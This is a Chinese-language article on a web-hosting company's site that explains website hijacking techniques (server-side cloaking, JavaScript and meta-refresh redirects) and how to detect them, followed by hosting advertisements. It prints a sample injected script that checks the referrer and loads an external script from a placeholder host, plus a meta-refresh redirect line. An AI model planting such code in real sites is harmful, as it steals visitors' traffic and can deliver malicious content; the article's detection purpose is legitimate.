怎么通過(guò)網(wǎng)站監(jiān)控解決劫持問(wèn)題-創(chuàng)新互聯(lián)

網(wǎng)站劫持是目前黑產(chǎn)最喜歡的一種網(wǎng)頁(yè)引流方式,此手法往往通過(guò)政府、教育機(jī)構(gòu)網(wǎng)站(權(quán)重高),修改網(wǎng)站源代碼、放寄生蟲(chóng)程序、設(shè)置二級(jí)目錄反向代理等實(shí)現(xiàn)。網(wǎng)頁(yè)劫持可以分為服務(wù)端劫持、客戶(hù)端劫持、快照劫持、搜索劫持等等;表現(xiàn)形式可以是劫持跳轉(zhuǎn),也可以是劫持呈現(xiàn)的網(wǎng)頁(yè)內(nèi)容,目前被廣泛應(yīng)用于游戲、等暴利行業(yè)。
 iis7網(wǎng)站監(jiān)控檢測(cè)
測(cè)網(wǎng)站是否被劫持、域名是否被墻、DNS污染檢測(cè)、網(wǎng)站打開(kāi)速度檢測(cè)等信息。
 服務(wù)端劫持也稱(chēng)為全局劫持,手法為修改網(wǎng)站動(dòng)態(tài)語(yǔ)言文本,判斷訪(fǎng)問(wèn)來(lái)源控制返回內(nèi)容,從來(lái)達(dá)到網(wǎng)站劫持的目的。
 asp/aspx/php劫持
 Global.asa、Global.asax、conn.asp、conn.php等文件比較特殊,作用是在每次執(zhí)行一個(gè)動(dòng)態(tài)腳本的時(shí)候,都會(huì)先加載該腳本, 然后再執(zhí)行目標(biāo)腳本。所以只要在 Global.asa 中寫(xiě)判斷用戶(hù)系統(tǒng)信息的代碼(訪(fǎng)問(wèn)來(lái)源等),如果是蜘蛛訪(fǎng)問(wèn)則返回關(guān)鍵詞網(wǎng)頁(yè)(想要推廣的網(wǎng)站),如果是用戶(hù)訪(fǎng)問(wèn),則返回正常頁(yè)面。
 客戶(hù)端劫持
 客戶(hù)端劫持的手法也很多,但主要就是2種:js劫持、Header劫持。
 js劫持
 js劫持目的:通過(guò)向目標(biāo)網(wǎng)頁(yè)植入惡意js代碼,控制網(wǎng)站跳轉(zhuǎn)、隱藏頁(yè)面內(nèi)容、窗口劫持等。
 js植入手法:可以通過(guò)***服務(wù)器,直接寫(xiě)入源代碼中;也可以寫(xiě)在數(shù)據(jù)庫(kù)中,因?yàn)橛行╉?yè)面會(huì)呈現(xiàn)數(shù)據(jù)庫(kù)內(nèi)容。
 js劫持案例
 效果:通過(guò)搜索引擎搜索點(diǎn)擊頁(yè)面(執(zhí)行一段js)跳轉(zhuǎn)到×××頁(yè)面;直接輸入網(wǎng)址訪(fǎng)問(wèn)網(wǎng)頁(yè),跳轉(zhuǎn)到404頁(yè)面。
 代碼:
 today=new Date();
 today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate();
 var regexp=/.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(.[a-z0-9-]+){1,2}\//ig;
 var where =document.referer;
 if(regexp.test(where)){
 document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>;');
 }
 else
 {
 window.location.href="../../404.htm";
 }
 分析:通過(guò)referer判斷來(lái)路,如果referer來(lái)路為空就是跳轉(zhuǎn)到404頁(yè)面,如果是搜索引擎來(lái)的referer里面也會(huì)有顯示,然后在寫(xiě)代碼控制跳轉(zhuǎn)。如果只是控制實(shí)現(xiàn)顯示不同的內(nèi)容,可以修改php、asp代碼;如果需要劫持搜索引擎搜索框,可以寫(xiě)JS代碼來(lái)做瀏覽器本地跳轉(zhuǎn)。當(dāng)然js功能可以無(wú)限擴(kuò)展,比如可以控制一個(gè)ip一天內(nèi)第一次訪(fǎng)問(wèn)正常,其余訪(fǎng)問(wèn)跳轉(zhuǎn)等等。
 header劫持
 在源代碼中寫(xiě)入以下代碼:
 1
 <meta http-equiv=“refresh“ content=“10; url=http://thief.one“>;
 利用的就是Meta Refresh Tag(自動(dòng)轉(zhuǎn)向),將流量引走。
 手法對(duì)比
 客戶(hù)端劫持與服務(wù)端區(qū)別
 客戶(hù)端劫持:每次訪(fǎng)問(wèn)網(wǎng)頁(yè)從服務(wù)端獲取到的網(wǎng)頁(yè)代碼都是相同的,只是控制了網(wǎng)頁(yè)代碼在瀏覽器中呈現(xiàn)的效果(比如是否進(jìn)行跳轉(zhuǎn)等)。
 服務(wù)端劫持:改變了每次訪(fǎng)問(wèn)網(wǎng)頁(yè)從服務(wù)端獲取到的網(wǎng)頁(yè)代碼。
 客戶(hù)端劫持與服務(wù)端判斷方法
 客戶(hù)端劫持的判斷方法:只需觀(guān)察瀏覽器呈現(xiàn)的網(wǎng)頁(yè)前端代碼,查看是否引用了不當(dāng)?shù)膉s,或者其它敏感內(nèi)容。
 服務(wù)端劫持的判斷方法:可以通過(guò)觀(guān)察網(wǎng)站后端代碼,或者通過(guò)改變ip,包頭等方式,觀(guān)察放回源碼是否不同。

讓客戶(hù)滿(mǎn)意是我們工作的目標(biāo),不斷超越客戶(hù)的期望值來(lái)自于我們對(duì)這個(gè)行業(yè)的熱愛(ài)。我們立志把好的技術(shù)通過(guò)有效、簡(jiǎn)單的方式提供給客戶(hù),將通過(guò)不懈努力成為客戶(hù)在信息化領(lǐng)域值得信任、有價(jià)值的長(zhǎng)期合作伙伴,公司提供的服務(wù)項(xiàng)目有:域名申請(qǐng)雅安服務(wù)器托管、營(yíng)銷(xiāo)軟件、網(wǎng)站建設(shè)、涇川網(wǎng)站維護(hù)、網(wǎng)站推廣。

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)cdcxhl.cn,海內(nèi)外云服務(wù)器15元起步,三天無(wú)理由+7*72小時(shí)售后在線(xiàn),公司持有idc許可證,提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國(guó)服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡(jiǎn)單易用、服務(wù)可用性高、性?xún)r(jià)比高”等特點(diǎn)與優(yōu)勢(shì),專(zhuān)為企業(yè)上云打造定制,能夠滿(mǎn)足用戶(hù)豐富、多元化的應(yīng)用場(chǎng)景需求。

本文名稱(chēng):怎么通過(guò)網(wǎng)站監(jiān)控解決劫持問(wèn)題-創(chuàng)新互聯(lián)
本文路徑:http://www.muchs.cn/article36/ddshsg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)頁(yè)設(shè)計(jì)公司、網(wǎng)站收錄、網(wǎng)站營(yíng)銷(xiāo)、搜索引擎優(yōu)化、網(wǎng)站維護(hù)服務(wù)器托管

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀(guān)點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話(huà):028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

h5響應(yīng)式網(wǎng)站建設(shè)